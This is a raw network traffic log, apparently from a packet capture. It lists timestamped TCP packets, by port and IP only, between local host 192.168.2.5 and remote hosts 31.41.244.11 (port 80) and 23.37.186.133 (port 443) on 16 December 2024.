Dec 16, 2024 11:03:21.311433077 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.311472893 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.312478065 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.312542915 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.312592983 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.312642097 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.313638926 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.313680887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.313719034 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.313755989 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.314805984 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.314829111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.314872980 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.314889908 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.316067934 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.316157103 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.316236973 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.316844940 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.317090034 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.317154884 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.317214966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.317332983 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.318264961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.318301916 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.318312883 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.318341970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.319422007 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.319518089 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.319567919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.320573092 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.320672989 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.320681095 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.320760965 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.321707964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.321758986 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.321815014 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.321854115 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.323098898 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.323164940 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.323185921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.323221922 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.324059963 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.324084997 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.324107885 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.324124098 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.325201035 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.325257063 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.325304031 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.325567961 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.326446056 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.326500893 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.326529026 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.326580048 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.327644110 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.327730894 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.327747107 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.327795982 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.328705072 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.328777075 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.328799009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.328838110 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.329845905 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.329916954 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.329941034 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.330034018 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.331056118 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.331213951 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.331269026 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.332165956 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.332223892 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.332261086 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.332304001 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.333316088 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.333367109 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.333410025 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.333451986 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.334402084 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.334470034 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.334539890 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.335597038 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.335654020 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.335663080 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.335705042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.336793900 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.336844921 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.336859941 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.336900949 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.337918043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.342689037 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.469399929 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.469449043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.469552040 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.469913006 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.470016003 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.470107079 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.470156908 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.470237970 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.470279932 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.471291065 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.471343040 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.471363068 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.471414089 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.472429037 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.472477913 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.472564936 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.472611904 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.473572969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.473618984 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.473712921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.473767996 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.474695921 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.474745035 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.474942923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.474987984 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.475920916 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.475967884 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.475992918 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.476037025 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.477065086 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.477114916 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.477190971 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.477238894 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.478163958 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.478214979 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.478275061 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.478323936 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.479374886 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.479422092 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.479491949 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.479535103 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.480561972 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.480607986 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.480639935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.480679989 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.481631041 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.481678009 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.481715918 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.481762886 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.482795000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.482842922 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.482958078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.483002901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.483964920 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.484067917 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.484114885 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.485126972 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.485282898 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.485341072 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.486268997 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.486315966 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.486387968 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.486433029 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.487458944 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.487508059 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.487576008 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.487618923 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.488610983 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.488660097 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.488699913 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.488744974 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.489713907 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.489727020 CET	443	49811	23.37.186.133	192.168.2.5
Dec 16, 2024 11:03:21.489799023 CET	443	49811	23.37.186.133	192.168.2.5
Dec 16, 2024 11:03:21.489801884 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.489831924 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.489872932 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.489891052 CET	49811	443	192.168.2.5	23.37.186.133
Dec 16, 2024 11:03:21.489891052 CET	49811	443	192.168.2.5	23.37.186.133
Dec 16, 2024 11:03:21.489958048 CET	443	49811	23.37.186.133	192.168.2.5
Dec 16, 2024 11:03:21.489995956 CET	443	49811	23.37.186.133	192.168.2.5
Dec 16, 2024 11:03:21.490015030 CET	443	49811	23.37.186.133	192.168.2.5
Dec 16, 2024 11:03:21.490056038 CET	49811	443	192.168.2.5	23.37.186.133
Dec 16, 2024 11:03:21.490056038 CET	49811	443	192.168.2.5	23.37.186.133
Dec 16, 2024 11:03:21.490087986 CET	49811	443	192.168.2.5	23.37.186.133
Dec 16, 2024 11:03:21.490927935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.490977049 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.490997076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.491039991 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.492032051 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.492079020 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.492144108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.492187023 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.493196011 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.493247986 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.493338108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.493381977 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.494343996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.494390965 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.494429111 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.494472027 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.495500088 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.495546103 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.495620012 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.495662928 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.496759892 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.496809006 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.496867895 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.496915102 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.497857094 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.497903109 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.497977972 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.498023033 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.498974085 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.499092102 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.499140978 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.500179052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.500256062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.500291109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.500329971 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.501291037 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.501415014 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.501473904 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.502429962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.502485037 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.502510071 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.502557039 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.503662109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.503734112 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.503782988 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.504770041 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.504817963 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.504851103 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.504890919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.505909920 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.506032944 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.506078959 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.507067919 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.507118940 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.507167101 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.507210970 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.508224010 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.508276939 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.508316994 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.508358955 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.509438038 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.509473085 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.509529114 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.510535002 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.510611057 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.510646105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.510689974 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.511723042 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.511749029 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.511778116 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.511791945 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.512873888 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.512969971 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.513020992 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.514017105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.514071941 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.514134884 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.514177084 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.515193939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.515434027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.515486002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.516391039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.516436100 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.516520977 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.516561031 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.517477036 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.517518997 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.517577887 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.517618895 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.518635035 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.518789053 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.518831968 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.519793034 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.519833088 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.519871950 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.519912004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.520945072 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.521151066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.521203041 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.522063971 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.522104025 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.522224903 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.522264957 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.523236990 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.523282051 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.523341894 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.524409056 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.524461031 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.524522066 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.524565935 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.525557041 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.525604010 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.525659084 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.525701046 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.526726961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.526771069 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.526823997 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.527885914 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.527935028 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.528012037 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.528060913 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.529026031 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.529076099 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.529109001 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.529160976 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.661729097 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.661828041 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.661834002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.661885023 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.662297964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.662427902 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.662493944 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.663497925 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.663554907 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.663618088 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.663667917 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.664619923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.664676905 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.664827108 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.664877892 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.665781021 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.665879965 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.665935993 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.666944027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.667052984 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.667059898 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.667108059 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.668091059 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.668150902 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.668220043 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.668268919 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.669287920 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.669394016 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.669411898 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.669593096 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.670393944 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.670458078 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.670521021 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.670572042 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.671036005 CET	443	49811	23.37.186.133	192.168.2.5
Dec 16, 2024 11:03:21.671221972 CET	49811	443	192.168.2.5	23.37.186.133
Dec 16, 2024 11:03:21.671287060 CET	443	49811	23.37.186.133	192.168.2.5
Dec 16, 2024 11:03:21.671366930 CET	49811	443	192.168.2.5	23.37.186.133
Dec 16, 2024 11:03:21.671550035 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:21.671619892 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:21.671680927 CET	80	49800	31.41.244.11	192.168.2.5
